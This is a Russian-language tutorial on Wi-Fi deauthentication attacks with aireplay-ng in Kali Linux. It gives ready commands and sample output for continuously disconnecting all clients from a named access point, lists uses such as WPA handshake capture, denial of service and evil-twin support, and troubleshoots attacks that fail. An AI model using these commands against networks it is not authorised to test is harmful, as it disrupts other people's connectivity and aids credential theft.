Деаутентификация клиентов беспроводной сети в Kali Linux Flashcards
Что такое деаутентификация (описание)
Эта атака отправляет пакеты для разъединения одному или более клиентам, которые в данный момент подключены к конкретной точке доступа. Рассоединение клиентов может быть выполнено по ряду причин:
Восстановление скрытого ESSID. Скрытый ESSID не присутствует в радиовещании. Другой термин для этого явления это “cloaked” (скрытая).
Захват рукопожатий WPA/WPA2 путём принуждения клиентов к разъединению
Генерация ARP запросов (клиенты Windows иногда стирают их ARP кэш во время дисконекта)
Атака отказ в обслуживании (DoS) — бесконечная отправка пакетов деаутентификации приводит к отказу в обслуживании
Содействие атаке злой двойник — отправка пакетов деаутентификации подавляет истинную ТД, при этом свои «услуги» начинает предлагать фальшивая ТД
Конечно, эта атака совершенно бесполезна, если отсутствуют подключённые беспроводные клиенты или имеет место фальшивые аутентификации.
Использование (реализация деаутентификации)
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0
Где:
-0 означает деаутентификацию
1 это количество отправляемых пакетов деаутентификации (вы можете отправлять несколько, если хотите); 0 означает отправлять их непрерывно
-a 00:14:6C:7E:40:80 это MAC адрес точки доступа
-c 000:0F:B5:AE:CE:9D это MAC адрес клиента для деаутентификации; если это значение пропущено, то все клиенты будут деаутентифицированы
ath0 это имя интерфейса
Типичный вывод
12:35:25 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
Примеры использования aireplay-ng
Как обычно, начнём с переводы карты в режим монитора (если вы ещё этого не сделали) как описано здесь.
Теперь нам нужно узнать ВSSID точки доступа, от которой мы будет отключать клиентов. Это можно сделать с помощью программы airodump-ng (справка по программе airodump-ng в Энциклопедии Kali Linux)
airodump-ng wlan0
Нас интересует сеть Mial, её ВSSID 20:25:64:16:58:8C
Я не нашёл клиентов этой сети, поэтому не указываю эту опцию. Также я поставил 0 для количества отправляемых пакетов.
Ещё обращаем внимание на канал, он равен единице. Установить канал можно командой iwconfig wlan0 channel n, где вместо n нужно подставить номер канала.
Таким образом, для успешной атаки нам нужно последовательно выполнить две команды:
iwconfig wlan0 channel 1
aireplay-ng -0 0 -a 20:25:64:16:58:8C wlan0
Вывод будет примерно таким:
root@HackWare:~# iwconfig wlan0 channel 1
root@HackWare:~# aireplay-ng -0 0 -a 20:25:64:16:58:8C wlan0
20:59:42 Waiting for beacon frame (BSSID: 20:25:64:16:58:8C) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client’s mac>).
20:59:42 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:42 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:43 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:43 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:44 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:44 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:45 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:45 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:45 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:46 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:46 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:47 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:47 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:48 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:48 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:49 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:49 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
20:59:50 Sending DeAuth to broadcast – BSSID: [20:25:64:16:58:8C]
Пока программа работает, невозможно подключиться к этой точке доступа.
Вместо ВSSID можно указывать более понятное имя (ESSID). Делается это с опцией -e. Т.е. для моего примера команда приобретёт вид:
aireplay-ng -0 0 -e Mial wlan0
Она равнозначна предыдущей и точно также прекрасно отработает.
Ошибка Waiting for beacon frame (BSSID: ) on channel No such BSSID available. Please specify an ESSID (-e).
Если при выполнении команды у вас появилось что-то подобное этому
1
2
3
4
root@HackWare:~# aireplay-ng -0 0 -a 20:25:64:16:58:8C wlan0
20:52:47 Waiting for beacon frame (BSSID: 20:25:64:16:58:8C) on channel 1
20:52:57 No such BSSID available.
Please specify an ESSID (-e).
Это означает что:
точка доступа на другом канале
точка доступа больше не доступна
другая программа поменяла канал вашего беспроводного сетевого интерфейса
Помните, что некоторые точки доступа настроены на автоматическую смену каналов, особенно после внезапной деаутентификации всех клиентов. Не забывайте переключать каналы в след за точкой доступа.
Почему деаутентификация не работает?
Этому может быть несколько причин, и одна или сразу несколько из них могут быть вашим случаем:
Вы слишком далеко от клиента(ов). Вам нужна достаточная мощность передатчика, чтобы пакеты достигали клиетов и могли быть услышаны ими. Если делаете полный захват пакетов, каждй отправленный клиенту пакет должен приводить к обратному “ack” пакету. Это означает, что клиент услышал пакет. Если “ack” нету, то вероятнее всего он не получил пакет.
Беспроводные карты работают в конкретном режиме, таких как b, g, n и т. д. Если ваша карта в другом режиме, чем карта клиента, то скорее всего клиенты не будет способен должным образом получить вашу передачу. Смотрите предыдущий пункт, для подтверждения того, что клиент получил пакет.
Некоторые клиенты игнорируют широковещательные деаутентификациии. В этом случае вам нужно отправить деаутентификацию напрямую конкретному клиенту.
Клиенты могут переподключаться слишком быстро для того, чтобы вы могли увидеть их разъединёнными. Если вы делаете полный захват пакетов, вы сможете увидеть пакеты воссоединения в захваченных данных, это подтвердит то, что деаутентификация работает.
